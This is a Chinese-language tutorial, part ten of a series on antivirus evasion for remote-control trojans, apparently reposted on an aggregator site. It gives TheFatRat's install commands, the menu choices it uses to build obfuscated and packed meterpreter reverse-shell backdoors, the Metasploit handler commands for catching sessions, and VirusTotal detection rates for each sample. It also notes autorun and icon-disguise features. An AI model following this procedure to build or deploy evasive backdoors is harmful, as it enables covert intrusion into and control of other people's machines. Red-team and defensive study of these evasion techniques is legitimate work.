远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70)
本專題文章導航
1、遠控免殺專題(1)-基礎篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg
2、遠控免殺專題(2)-msfvenom隱藏的參數:https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w
3、遠控免殺專題(3)-msf自帶免殺(VT免殺率35/69):https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA
4、遠控免殺專題(4)-Evasion模塊(VT免殺率12/71):https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ
5、遠控免殺專題(5)-Veil免殺(VT免殺率23/71):https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw
6、遠控免殺專題(6)-Venom免殺(VT免殺率11/71):https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ
7、遠控免殺專題(7)-Shellter免殺(VT免殺率7/69):https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg
8、遠控免殺專題(8)-BackDoor-Factory免殺(VT免殺率13/71):https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ
9、遠控免殺專題(9)-Avet免殺(VT免殺率14/71):https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA
10、遠控免殺專題(10)-TheFatRat免殺(VT免殺率22/70):本文
文章打包下載及相關軟件下載:https://github.com/TideSec/BypassAntiVirus
免殺能力一覽表
幾點說明:
1、上表中標識 √ 說明相應殺毒軟件未檢測出病毒,也就是代表了Bypass。
2、為了更好的對比效果,大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。
3、由于本機測試時只是安裝了360全家桶和火絨,所以默認情況下360和火絨殺毒情況指的是靜態+動態查殺。360殺毒版本5.0.0.8160(2020.01.01),火絨版本5.0.34.16(2020.01.01),360安全衛士12.0.0.2002(2020.01.01)。
4、其他殺軟的檢測指標是在virustotal.com(簡稱VT)上在線查殺,所以可能只是代表了靜態查殺能力,數據僅供參考,不足以作為免殺的精確判斷指標。
5、完全不必要苛求一種免殺技術能bypass所有殺軟,這樣的技術肯定是有的,只是沒被公開,一旦公開第二天就能被殺了,其實我們只要能bypass目標主機上的殺軟就足夠了。
一、TheFatRat介紹
TheFatRat創建的后門或者payload,可以在Linux,Windows,Mac和Android上等多種平臺上執行,可生成exe、apk、sh、bat、py等多種格式。TheFatRat可以和msf無縫對接,并且集成內置了Fudwin、Avoid、backdoor-factory等多個免殺工具,對powershell的免殺姿勢尤其多樣。
二、安裝TheFatRat
推薦使用linux操作系統,如Kali、Parrot、Dracos、BackTrack、Backbox等。
1、Github安裝
安裝比較簡單,首先從github上clone下來
git clone https://github.com/Screetsec/TheFatRat
然后進入TheFatRat目錄
cd TheFatRat
執行安裝命令
chmod +x setup.sh && ./setup.sh
在成功安裝后,可以查看TheFatRat/logs目錄下的setup.log文件,里面是TheFatRat需要的一些軟件和環境。
2、軟件升級
作者提供了升級的命令,可直接升級軟件
./update && chmod + x setup.sh && ./setup.sh
三、TheFatRat使用說明
在安裝完成后,使用命令fatrat即可執行,啟動略慢。TheFatRat和專題9里的Avet一樣,也默認不允許遠程連接后執行,只能在linux主機內執行。
運行時會檢測一些軟件或環境是否已經安裝
同時還會有個界面提醒大家不要把生成的后門上傳到virustotal.com上面,可以上傳到nodistribute.com(專門試了下,但上傳樣本一直不成功)。
之后就能看到啟動后的界面了
常用創建后門菜單如下,我自己翻譯解釋了一下,有個別可能不太準確。
[01] Create Backdoor with msfvenom #01:直接利用msf來生產后門,基本不能免殺
[02] Create Fud 100% Backdoor with Fudwin 1.0#02:使用Fudwin 1.0創建powershell后門,ps1利用powerstager混淆,從結果來看效果不錯
[03] Create Fud Backdoor with Avoid v1.2 # 03: 使用Avoid v1.2創建后門
[04] Create Fud Backdoor with backdoor-factory [embed] #04:使用backdoor-factory創建后門
[05] Backdooring Original apk [Instagram, Line,etc] #05:生成安卓使用的apk后門
[06] Create Fud Backdoor 1000% with PwnWinds [Excelent] #06:綜合了多種方式,可生成bat、exe、dll、ps1等,可利用c、C#多種語言編譯,官方非常推薦,但經嘗試免殺效果一般,肯定是被殺軟列入特征庫了
[07] Create Backdoor For Office with Microsploit #07:生成office類后門
[08] Trojan Debian Package For Remote Access [Trodebi]#08:生成linux后門
由于01是直接調用了msfvenom生成payload,只不過稍微進行了多個msfvenom編碼,免殺效果肯定一般。
[01] Create Backdoor with msfvenom生成過程如下:
我這里就直接使用官方推薦的2和6進行測試了。
四、使用TheFatRat生成ps1-exe(VT免殺率22/70)
在主菜單選擇2,進入[02] Create Fud 100% Backdoor with Fudwin 1.0,選擇1,利用powerstager混淆,并將powershell編譯成exe。
在生成過程中可能會報錯,如下所示
這個時候需要去查看TheFatRat/logs目錄下的fudwin.log文件,看看什么報錯信息。
我的第一次報錯是因為python沒有安裝named包,第二次報錯是因為輸入的文件名沒有寫后綴,這里特別注意,必須寫后綴,不然會報錯。
這樣就生成成功了。
在我本地機器上監聽3333端口
use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 10.211.55.2set LPORT 3333exploit -j
在測試機器上執行payload13.exe
雖然報錯,但可正常上線。
打開殺軟進行測試,雖然火絨靜態查殺沒查出來,不過行為檢測查殺到了。360靜態和動態都能查殺。(病毒庫均已更新到2020.01.01)
virustotal.com中22/70個報毒
五、使用TheFatRat生成加殼exe(VT免殺率12/70)
在主菜單選擇2,進入[02] Create Fud 100% Backdoor with Fudwin 1.0,選擇2,slow but powerfull(慢但是有效)
輸入監聽ip和端口后,可能會報錯,也可能解密界面都消失,但其實后臺還在運行.
看免殺過程,應該是msfvenom一定編碼后進行upx加殼,可能還有其他處理,想了解詳細過程的可以看下源碼。
等一段時間后,在/root/Fatrat_Generated/目錄下會發現生成了Powerfull.exe和Powerfull-fud.exe。
在測試機器運行,火絨靜態動態都可查殺,可正常上線
360動態和靜態都沒有反應
virustotal.com中12/70個報毒
六、使用TheFatRat編譯C#+powershell生成exe(VT免殺率37/71)
嘗試官方比較推薦的第6種方式[06] Create Fud Backdoor 1000% with PwnWinds [Excelent],進入后菜單如下,我選擇2使用c#+powershell來生成exe
配置好ip和端口,選擇好監聽payload
生成成功
可正常上線
打開殺軟,靜態檢測沒問題,但行為檢測時360和火絨都報預警了。
virustotal.com中37/71個報毒
之后也嘗試了下生成bat和dll文件,免殺率大約在18/58和22/65。
四、小結
TheFatRat創建的后門格式和支持的平臺比較多樣化,而且還支持生成CDROM/U盤中能自動運行(生成AutoRun文件)的后門文件,并且可以對payload更改圖標,具有一定偽裝效果。
TheFatRat的很多免殺方式是借助于msfvenom編碼、upx等加殼壓縮、c/c#編譯等將powershell混淆后編譯成exe或bat文件,但有些在執行時還是會調用powershell,而powershell的調用已經被各大殺軟盯的很緊了,所以查殺效果只能算是一般了。
由于使用TheFatRat生成了多種payload,免殺效果各不相同,我就選了個折中一些的22/70作為TheFatRat的免殺代表。
五、參考資料
TheFatRat 一款簡易后門工具:https://www.zhuanzhi.ai/document/22f6e03336336de7f211ac7b97c2fb0f
TheFatRat – 跨平臺反彈后門Shell生成神器:http://caidaome.com/?post=198
掃描下方二維碼學習更多WEB安全知識:
Ms08067安全實驗室
專注于普及網絡安全知識。團隊已出版《Web安全攻防:滲透測試實戰指南》,《內網安全攻防:滲透測試實戰指南》,目前在編Python滲透測試,JAVA代碼審計和二進制逆向方面的書籍。
團隊公眾號定期分享關于CTF靶場、內網滲透、APT方面技術干貨,從零開始、以實戰落地為主,致力于做一個實用的干貨分享型公眾號。
官方網站:www.ms08067.com
總結
以上是生活随笔為你收集整理的远控免杀专题(10)-TheFatRat免杀(VT免杀率22/70)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 深入理解golang 的栈
- 下一篇: mtk x20 android 开发环境